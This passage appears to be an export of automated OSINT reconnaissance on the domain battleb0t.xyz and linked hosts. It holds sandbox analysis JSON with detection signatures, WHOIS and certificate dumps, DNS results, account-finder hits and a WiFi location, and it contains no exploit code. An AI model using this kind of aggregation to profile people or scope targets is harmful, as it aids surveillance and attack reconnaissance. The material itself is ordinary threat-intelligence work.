u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"anonymousplanet-ng.org"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007516]\n "f_00024d" has type "JPEG image data baseline precision 8 1094x527 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00007732]\n "d7540acf-f2a5-4f49-a1ea-307942bec9de.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\d7540acf-f2a5-4f49-a1ea-307942bec9de.tmp]- [targetUID: 00000000-00007516]\n "f_000268" has type "JPEG image data progressive precision 8 500x500 components 3"- [targetUID: N/A]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7516_1432934247\\shopping_iframe_driver.js]- [targetUID: 00000000-00007516]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007516]\n "f_00023e" has type "PNG image data 1472 x 711 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007732]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Speech Recognition\\1.15.0.1\\manifest.json]- [targetUID: 00000000-00007516]\n "f_000243" has type "JPEG image data baseline precision 8 957x630 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00007732]\n "05718f91-038a-4a83-95b9-0746c34b8b24.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 1189 x 366 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007732]\n "18782bcb-f0c5-4225-b53e-723a5c8e090c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\18782bcb-f0c5-4225-b53e-723a5c8e090c.tmp]- [targetUID: 00000000-00007516]\n "d91d444f-c302-4c6f-acf6-06790042151e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\d91d444f-c302-4c6f-acf6-06790042151e.tmp]- [targetUID: 00000000-00007516]\n "f_00026e" has type "JPEG image data baseline precision 8 1079x836 components 3"- [targetUID: N/A]\n "d214a62f-b179-445a-8f70-dd89475f7efa.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d214a62f-b179-445a-8f70-dd89475f7efa.tmp]- [targetUID: 00000000-00007516]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007516]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Speech Recognition\\1.15.0.1\\manifest.fingerprint]- [targetUID: 00000000-00007516]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007516]\n "f_00026b" has type "JPEG image data baseline precision 8 1062x601 components 3"- [targetUID: N/A]\n "24123523-1b93-4cf0-be94-11e2071c1fe5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://anonymousplanet-ng.org/guide.html#how-to-share-files-or-chat-anonymously"\n Pattern match: "https://anonymousplanet-ng.org"\n Heuristic match: "anonymousplanet-ng.org"\n Pattern match: "ect.org/manual/_"\n Heuristic match: "roJ\'ect.org"\n Heuristic match: "https:I/briarproJ\'ect.org/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-36', u'name': u'Process binds to unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Process "%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" binds to port 49712\n Process "%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" binds to port 49713\n Process "%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" binds to port 49714'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/92 Antivirus vendors marked sample as malicious (1% detection rate)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-11', u'name': u'The analysis extracted a file that was identified as malicious', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None | 185.199.109.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | rsi (Category: gaming)
https://robertsspaceindustries.com/citizens/login | login |
| 2023-05-12 03:17:36 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: AHU.XYZ
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40.0Z
Creation Date: 2020-08-10T01:10:12.0Z
Registry Expiry Date: 2026-08-10T23:59:59.0Z
Registrar: Google Inc
Registrar IANA ID: 895
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.2065311374
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ahu.xyz
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40Z
Creation Date: 2020-08-10T01:10:12Z
Registrar Registration Expiration Date: 2026-08-10T23:59:59Z
Registrar: Google LLC
Registrar IANA ID: 895
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.8772376466
Domain Status: serverTransferProhibited https://www.icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: go663216313251
Registrant Name: Contact Privacy Inc. Customer 7151571251
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant Street: 96 Mowat Ave
Registrant City: Toronto
Registrant State/Province: ON
Registrant Postal Code: M4K 3K1
Registrant Country: CA
Registrant Phone: +1.4165385487
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Admin ID: go663216313251
Admin Name: Contact Privacy Inc. Customer 7151571251
Admin Organization: Contact Privacy Inc. Customer 7151571251
Admin Street: 96 Mowat Ave
Admin City: Toronto
Admin State/Province: ON
Admin Postal Code: M4K 3K1
Admin Country: CA
Admin Phone: +1.4165385487
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Tech ID: go663216313251
Tech Name: Contact Privacy Inc. Customer 7151571251
Tech Organization: Contact Privacy Inc. Customer 7151571251
Tech Street: 96 Mowat Ave
Tech City: Toronto
Tech State/Province: ON
Tech Postal Code: M4K 3K1
Tech Country: CA
Tech Phone: +1.4165385487
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:16:36.418919Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
Please register your domains at: https://domains.google.com/
This data is provided by Google for information purposes, and to assist
persons obtaining information about or related to domain name registration
records. Google does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances, will you use this data to:
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail (spam); or
2) enable high volume, automated, electronic processes that apply to this
WHOIS server.
These terms may be changed without prior notice.
By submitting this query, you agree to abide by this policy.
| ahu.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154FA6D (Net ID: 00:01:E3:54:FA:6D) | 52.3759, 4.8975 |
| 2023-05-12 02:56:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.eleuzina.sk/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar17A3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar17A4.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3664"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IE_EarlyTabStart_0xe60_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_ConnHashTable<3664>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e50_ConnHashTable<3664>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e50_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "N0EQF2XV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N0EQF2XV.txt]- [targetUID: 00000000-00003664]\n Dropped file: "7D2Y51ZU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7D2Y51ZU.txt]- [targetUID: 00000000-00003664]\n Dropped file: "CD5VNIO4.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CD5VNIO4.txt]- [targetUID: 00000000-00003080]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab17A2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1791.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003080]\n "Tar17A3.tmp" has type "data"- Location: [%TEMP%\\Tar17A3.tmp]- [targetUID: 00000000-00003080]\n "~DFD224B327448F3092.TMP" has type "data"- Location: [%TEMP%\\~DFD224B327448F3092.TMP]- [targetUID: 00000000-00003664]\n "~DF2BFAF84F2483A9EA.TMP" has type "data"- Location: [%TEMP%\\~DF2BFAF84F2483A9EA.TMP]- [targetUID: 00000000-00003664]\n "~DF07EEC741044523D3.TMP" has type "data"- Location: [%TEMP%\\~DF07EEC741044523D3.TMP]- [targetUID: 00000000-00003664]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003080]\n "N0EQF2XV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N0EQF2XV.txt]- [targetUID: 00000000-00003664]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar17A4.tmp" has type "data"- Location: [%TEMP%\\Tar17A4.tmp]- [targetUID: 00000000-00003080]\n "~DF6A3365F64F9D0A70.TMP" has type "data"- Location: [%TEMP%\\~DF6A3365F64F9D0A70.TMP]- [targetUID: 00000000-00003664]\n "Cab17A2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab17A2.tmp]- [targetUID: 00000000-00003080]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003664]\n "RecoveryStore._8662D845-7FF9-11ED-8F03-0800277C4D18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "7D2Y51ZU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7D2Y51ZU.txt]- [targetUID: 00000000-00003664]\n "site_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003080]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003080]\n "_8662D847-7FF9-11ED-8F03-0800277C4D18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.eleuzina.sk/site.webmanifest"\n Pattern match: "https://www.eleuzina.sk"\n Pattern match: "www.eleuzina.sk"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 285\nContent-Type: application/octet-stream\nDate: Tue, 20 Dec 2022 00:54:55 GMT\nEtag: "50b305a2becc1418afde3a122a99e9e1-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMPGDGGGDB0PF7SK4KRJ | 104.196.30.220 |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 214.30.196.104.bc.googleusercontent.com | 104.196.30.214 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflare.net | route2.mx.cloudflare.net |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Linktree (Category: social)
https://linktr.ee/ayhu | ayhu |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | www.battleb0t.xyz |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.138): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:7d:70:13:0d:8c:86:f5:d2:71:80:52:b0:81:9f:
d1:36:dd:fc:cb:3b:22:94:33:e2:be:58:b6:3f:ed:5d:35:71:
fe:92:a5:53:e0:f1:36:f0:a2:e7:eb:a2:ad:86:80:be:02:31:
00:b4:75:e4:7e:fc:a0:b6:34:ee:54:89:8a:b5:86:bf:2b:19:
a0:d9:77:ee:64:10:e8:70:df:08:20:8e:21:54:dc:0c:9d:83:
c5:fb:9a:5e:61:df:01:60:14:be:f2:93:65
|
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': 